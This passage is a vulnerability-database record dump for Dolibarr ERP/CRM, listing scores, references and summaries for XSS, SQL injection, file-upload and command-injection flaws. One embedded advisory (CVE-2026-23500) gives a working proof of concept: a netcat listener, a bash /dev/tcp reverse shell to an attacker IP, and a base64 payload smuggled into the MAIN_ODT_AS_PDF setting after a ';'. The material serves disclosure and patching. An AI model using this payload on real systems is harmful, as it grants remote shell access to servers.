reference_url https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/user/document.php
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/user/document.php
3
reference_url https://github.com/advisories/GHSA-49xw-hw94-fmv2
reference_id GHSA-49xw-hw94-fmv2
reference_type
scores
url https://github.com/advisories/GHSA-49xw-hw94-fmv2
4
reference_url https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-49xw-hw94-fmv2
reference_id GHSA-49xw-hw94-fmv2
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-49xw-hw94-fmv2
fixed_packages
aliases GHSA-49xw-hw94-fmv2
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-j345-dk2c-yfds
16
url VCID-jbkd-su9m-3udy
vulnerability_id VCID-jbkd-su9m-3udy
summary
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cross-site Scripting (XSS) - Generic in GitHub repository dolibarr/dolibarr prior to 18.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-5323
reference_id
reference_type
scores
0
value 0.00206
scoring_system epss
scoring_elements 0.42998
published_at 2026-06-07T12:55:00Z
1
value 0.00206
scoring_system epss
scoring_elements 0.43021
published_at 2026-06-06T12:55:00Z
2
value 0.00206
scoring_system epss
scoring_elements 0.43011
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-5323
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/695ca086847b3b6a185afa93e897972c93c43d15
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-20T15:11:59Z/
url https://github.com/dolibarr/dolibarr/commit/695ca086847b3b6a185afa93e897972c93c43d15
3
reference_url https://huntr.dev/bounties/7a048bb7-bfdd-4299-931e-9bc283e92bc8
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-20T15:11:59Z/
url https://huntr.dev/bounties/7a048bb7-bfdd-4299-931e-9bc283e92bc8
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-5323
reference_id CVE-2023-5323
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-5323
5
reference_url https://github.com/advisories/GHSA-39m3-cj8c-886r
reference_id GHSA-39m3-cj8c-886r
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-39m3-cj8c-886r
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@18.0.0
purl pkg:composer/dolibarr/dolibarr@18.0.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.0
aliases CVE-2023-5323, GHSA-39m3-cj8c-886r
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jbkd-su9m-3udy
17
url VCID-k9nc-tze6-k7bx
vulnerability_id VCID-k9nc-tze6-k7bx
summary
Dolibarr has Insufficient Verification of Data Authenticity
A security flaw has been discovered in Dolibarr ERP CRM up to 23.0.2. This vulnerability affects the function dol_verifyHash in the library htdocs/core/lib/security.lib.php of the component Online Signature Module. The manipulation results in improper verification of a cryptographic signature. The attack may be performed remotely. Attacks of this nature are highly complex. It is stated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-7689
reference_id
reference_type
scores
0
value 9e-05
scoring_system epss
scoring_elements 0.01022
published_at 2026-06-06T12:55:00Z
1
value 9e-05
scoring_system epss
scoring_elements 0.01023
published_at 2026-06-07T12:55:00Z
2
value 9e-05
scoring_system epss
scoring_elements 0.01021
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-7689
1
reference_url https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158
reference_id
reference_type
scores
0
value 2.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
3
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
4
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
5
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/
url https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-7689
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-7689
4
reference_url https://vuldb.com/submit/801794
reference_id
reference_type
scores
0
value 2.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
3
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
4
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
5
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/
url https://vuldb.com/submit/801794
5
reference_url https://vuldb.com/vuln/360859
reference_id
reference_type
scores
0
value 2.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
3
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
4
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
5
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/
url https://vuldb.com/vuln/360859
6
reference_url https://vuldb.com/vuln/360859/cti
reference_id
reference_type
scores
0
value 2.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
3
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
4
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
5
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/
url https://vuldb.com/vuln/360859/cti
7
reference_url https://github.com/advisories/GHSA-jggh-5rmh-r6h5
reference_id GHSA-jggh-5rmh-r6h5
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jggh-5rmh-r6h5
fixed_packages
aliases CVE-2026-7689, GHSA-jggh-5rmh-r6h5
risk_score 2.9
exploitability 0.5
weighted_severity 5.7
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k9nc-tze6-k7bx
18
url VCID-mpmz-eh21-nkcm
vulnerability_id VCID-mpmz-eh21-nkcm
summary
Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration
### Summary
An authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the `MAIN_ODT_AS_PDF` configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the `exec()` function in the ODT to PDF conversion process.

### Details
The vulnerability is located in `htdocs/includes/odtphp/odf.php`.
When the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the `MAIN_ODT_AS_PDF` global setting.

Code snippet (`htdocs/includes/odtphp/odf.php`, approx line 930):
```php
$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);
```

While the filename `$name` is sanitized using `escapeshellcmd()`, the configuration variable `MAIN_ODT_AS_PDF` is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like `;`) followed by arbitrary commands.

### PoC
**Prerequisites:**
1. Login as an Administrator.
2. Ensure the "Commercial Proposals" module is enabled and "ODT templates" are activated in its setup.

**Steps to reproduce (Reverse Shell):**

1.  Start a netcat listener on the attacker's machine (IP: `172.26.0.1`, Port: `4445`):
   ```bash
   nc -lvnp 4445
   ```

2. Prepare the payload. To avoid issues with special characters (like `&` or `>`) being escaped by the web application or shell, encode the reverse shell command in Base64:
   ```bash
   # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'
   echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
   # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
   ```

3. Navigate to **Home -> Setup -> Other Setup**.

4. Add or modify the constant `MAIN_ODT_AS_PDF` with the following injection payload:
   ```bash
   jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
   ```
   *(Explanation: `jodconverter` satisfies the initial check, `;` acts as a command separator, and the pipeline decodes and executes the Base64 payload).*
![image](https://github.com/user-attachments/assets/12e4aa61-eb9d-4342-bd03-9a1e824b8316)

5. Navigate to **Commerce -> New proposal**, create a draft, select an ODT template (e.g., `generic_proposal_odt`), and click **Generate**.
![image](https://github.com/user-attachments/assets/d790847e-50c1-47eb-994b-b2596b949242)
![image](https://github.com/user-attachments/assets/afbeb170-d004-49d6-a395-1b4572fbf2e7)
![image](https://github.com/user-attachments/assets/93fbe6c9-96a8-4d0f-ad0e-4aea69f0fec1)

6. Check the netcat listener. A connection will be established, granting a shell on the server:

![image](https://github.com/user-attachments/assets/e90817da-9bb2-4fe1-8377-be10d8640e37)

### Impact
**Remote Code Execution (RCE).**
An attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically `www-data`). This allows for:
- Reading sensitive configuration files (database credentials).
- Modifying application code.
- Full system compromise depending on server configuration (e.g., Docker escape, pivoting to other hosts).

---

### Credits
Reported by Łukasz Rybak
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-23500
reference_id
reference_type
scores
0
value 0.00166
scoring_system epss
scoring_elements 0.37468
published_at 2026-06-07T12:55:00Z
1
value 0.00166
scoring_system epss
scoring_elements 0.375
published_at 2026-06-06T12:55:00Z
2
value 0.00166
scoring_system epss
scoring_elements 0.37495
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-23500
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-18T03:06:09Z/
url https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0
3
reference_url https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-18T03:06:09Z/
url https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-23500
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-23500
5
reference_url https://github.com/advisories/GHSA-w5j3-8fcr-h87w
reference_id GHSA-w5j3-8fcr-h87w
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w5j3-8fcr-h87w
fixed_packages
aliases CVE-2026-23500, GHSA-w5j3-8fcr-h87w
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mpmz-eh21-nkcm
19
url VCID-pfyf-s4fc-d3a8
vulnerability_id VCID-pfyf-s4fc-d3a8
summary
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
File Upload vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to execute arbitrary code and obtain sensitive information via the extension filtering and renaming functions.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-24T20:34:30Z/
url http://dolibarr.com
1
reference_url https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38887_Dolibarr_AFU.pdf
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-24T20:34:30Z/
url https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38887_Dolibarr_AFU.pdf
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-38887
reference_id
reference_type
scores
0
value 0.03022
scoring_system epss
scoring_elements 0.86886
published_at 2026-06-07T12:55:00Z
1
value 0.03022
scoring_system epss
scoring_elements 0.86894
published_at 2026-06-05T12:55:00Z
2
value 0.03022
scoring_system epss
scoring_elements 0.8689
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-38887
3
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-38887
reference_id CVE-2023-38887
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-38887
5
reference_url https://github.com/advisories/GHSA-g8h7-mcp6-pf47
reference_id GHSA-g8h7-mcp6-pf47
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g8h7-mcp6-pf47
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@17.0.1
purl pkg:composer/dolibarr/dolibarr@17.0.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1
aliases CVE-2023-38887, GHSA-g8h7-mcp6-pf47
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pfyf-s4fc-d3a8
20
url VCID-rqux-jkta-4kfj
vulnerability_id VCID-rqux-jkta-4kfj
summary
Logic error in dolibarr/dolibarr
Business Logic Errors in GitHub repository dolibarr/dolibarr prior to 16.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-0746
reference_id
reference_type
scores
0
value 0.00215
scoring_system epss
scoring_elements 0.44032
published_at 2026-06-04T12:55:00Z
1
value 0.00215
scoring_system epss
scoring_elements 0.44084
published_at 2026-06-07T12:55:00Z
2
value 0.00215
scoring_system epss
scoring_elements 0.44109
published_at 2026-06-06T12:55:00Z
3
value 0.00215
scoring_system epss
scoring_elements 0.44101
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-0746
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/4973019630d51ad76b7c1a4141ec7a33053a7d21
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/4973019630d51ad76b7c1a4141ec7a33053a7d21
3
reference_url https://huntr.dev/bounties/b812ea22-0c02-46fe-b89f-04519dfb1ebd
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/b812ea22-0c02-46fe-b89f-04519dfb1ebd
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-0746
reference_id CVE-2022-0746
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-0746
5
reference_url https://github.com/advisories/GHSA-8vq6-5f66-hp3r
reference_id GHSA-8vq6-5f66-hp3r
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8vq6-5f66-hp3r
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@16.0.0
purl pkg:composer/dolibarr/dolibarr@16.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-49k5-kwjc-z3hd
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0
aliases CVE-2022-0746, GHSA-8vq6-5f66-hp3r
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rqux-jkta-4kfj
21
url VCID-s3xn-47cy-eucf
vulnerability_id VCID-s3xn-47cy-eucf
summary
Cross site scripting in dolibarr
A Cross-site Scripting (XSS) vulnerability exists in the admin/accountant.php file. The fields `town`, `name`, and `Accountant code` can be used to escape double quote protection.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-2060
reference_id
reference_type
scores
0
value 0.00511
scoring_system epss
scoring_elements 0.668
published_at 2026-06-04T12:55:00Z
1
value 0.00511
scoring_system epss
scoring_elements 0.66832
published_at 2026-06-07T12:55:00Z
2
value 0.00511
scoring_system epss
scoring_elements 0.66848
published_at 2026-06-06T12:55:00Z
3
value 0.00511
scoring_system epss
scoring_elements 0.6684
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-2060
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/2b5b9957c3010a5db9d1988c2efe5b209b16b47f
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/2b5b9957c3010a5db9d1988c2efe5b209b16b47f
3
reference_url https://huntr.dev/bounties/2acfc8fe-247c-4f88-aeaa-042b6b8690a0
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/2acfc8fe-247c-4f88-aeaa-042b6b8690a0
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-2060
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-2060
5
reference_url https://github.com/advisories/GHSA-8fvr-7945-mg7w
reference_id GHSA-8fvr-7945-mg7w
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8fvr-7945-mg7w
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@16.0.0
purl pkg:composer/dolibarr/dolibarr@16.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-49k5-kwjc-z3hd
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0
aliases CVE-2022-2060, GHSA-8fvr-7945-mg7w
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-s3xn-47cy-eucf
22
url VCID-srth-2stq-gyaq
vulnerability_id VCID-srth-2stq-gyaq
summary
Dolibarr has an Injection issue
A vulnerability was identified in Dolibarr ERP CRM up to 23.0.2. This affects the function _checkValForAPI of the file htdocs/expedition/class/expedition.class.php of the component Shipments API Endpoint. The manipulation of the argument fields leads to sql injection. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. It is indicated that the exploitability is difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-7688
reference_id
reference_type
scores
0
value 0.00028
scoring_system epss
scoring_elements 0.08308
published_at 2026-06-05T12:55:00Z
1
value 0.00028
scoring_system epss
scoring_elements 0.08297
published_at 2026-06-07T12:55:00Z
2
value 0.00028
scoring_system epss
scoring_elements 0.08316
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-7688
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
1
value 1.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-7688
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
